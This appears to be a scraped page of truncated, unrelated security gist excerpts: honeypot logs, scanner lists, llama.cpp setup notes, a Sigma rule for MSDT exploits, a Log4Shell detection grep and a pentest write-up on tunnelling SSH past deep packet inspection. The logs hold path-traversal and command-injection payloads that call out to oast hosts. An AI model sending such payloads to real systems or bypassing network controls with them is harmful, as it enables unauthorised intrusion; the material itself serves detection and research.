andrew-morris

Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../

SteveClement

AWS Prowler Scan
AWS Scout2 Scan
AWS Security Finding Format (ASFF) Scan
AWS Security Hub Scan
Acunetix Scan
Acunetix360 Scan
Anchore Engine Scan
Anchore Enterprise Policy Check
Anchore Grype
AnchoreCTL Policies Report

rain-1

This worked on 14/May/23. The instructions will probably require updating in the future.

llama is a text prediction model similar to GPT-2, and the version of GPT-3 that has not been fine tuned yet. It is also possible to run fine tuned versions (like alpaca or vicuna with this. I think. Those versions are more focused on answering questions)

Note: I have been told that this does not support multiple GPUs. It can only use a single GPU.

It is possible to run LLama 13B with a 6GB graphics card now! (e.g. a RTX 2060). Thanks to the amazing work involved in llama.cpp. The latest change is CUDA/cuBLAS which allows you pick an arbitrary number of the transformer layers to be run on the GPU. This is perfect for low VRAM.

• Clone llama.cpp from git, I am on commit 08737ef720f0510c7ec2aa84d7f70c691073c35d.

gallypette

FIRST mermaid graph

Keeping in mind the "Latency Numbers Every Programmer Should Know", i.e. network access is expensive.

Online request (service is provided by hashlookup online API)

• existing / not existing have the same high cost
• network access takes a long time
• leak every hash to hashlookup service

kevthehermit

title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
    - https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
    - https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:

Sc00bz

<?php

// Collision taken from https://shattered.io/

// Outputs:
// HMAC-SHA1(key, msg1): 9b4dee1a35fc03786f1162989d1e441ba0e69f4d
// HMAC-SHA1(key, msg2): 9b4dee1a35fc03786f1162989d1e441ba0e69f4d
//
// HMAC-SHA256(key, msg1): e98a27bd93001cda9810b93c2191f5099817bb31f5445bc12cafd27a78cb4506
// HMAC-SHA256(key, msg2): 97aa871b175a99417f7f1c44ac2793730821caf7da697ff374c60f595ef5173a

gmurdocca

Circumventing Deep Packet Inspection with Socat and rot13

I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (eg PuTTY). I am tasked to ensure this Citrix design is secure, and users can not access their Linux VM's or other resources on the internal private network in any way outside of using Citrix.

The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.

Rejected by Deep Packet Inspection

I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o

adulau

Tor2web and tor proxies public list

List of services which are giving access to Tor network and especially Tor hidden services via web interface. We keep track of potential injection or abuse from such service (the column Scam).

List

Url	Status	Domain	Log	Techno	Scam
https://onion.re/	UP	onion.re	full	custom	no

SwitHak

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

• If you want to add a link, comment or send it to me
• Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

• Royce Williams list sorted by vendors responses Royce List
• Very detailed list NCSC-NL
• The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

Neo23x0

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log